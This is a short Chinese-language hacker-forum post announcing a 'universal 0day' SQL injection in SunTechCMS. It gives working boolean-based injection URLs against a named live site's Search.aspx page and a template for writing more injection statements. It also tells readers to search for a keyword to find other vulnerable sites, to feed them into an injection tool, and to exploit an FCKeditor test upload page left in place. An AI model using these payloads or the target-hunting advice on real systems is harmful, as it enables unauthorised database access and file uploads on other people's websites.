SunTechCMS 搜索型注入通殺0day

標題:SunTechCMS 搜索型注入通殺0day

做者:hackdn

轉載請註明

 

漏洞：

 

hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=1%20and%20'%'='

hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=2%20and%20'%'='

 本身構造語句：%'and 注入語句 and '%25'='

閒累的本身找個關鍵字，再把地址hellxman.blog.51cto.com/Search.aspx?swhere=  扔工具裏頭

 

而且Fckeditor的test.html沒刪,/fckeditor/editor/filemanager/connectors/test.html

 

 

 

PS:最近檢測網站多了，隨手便找了下源碼的漏洞，大多不是太主流的CMS，本身當作記錄，過兩天爆個Discuz的洞玩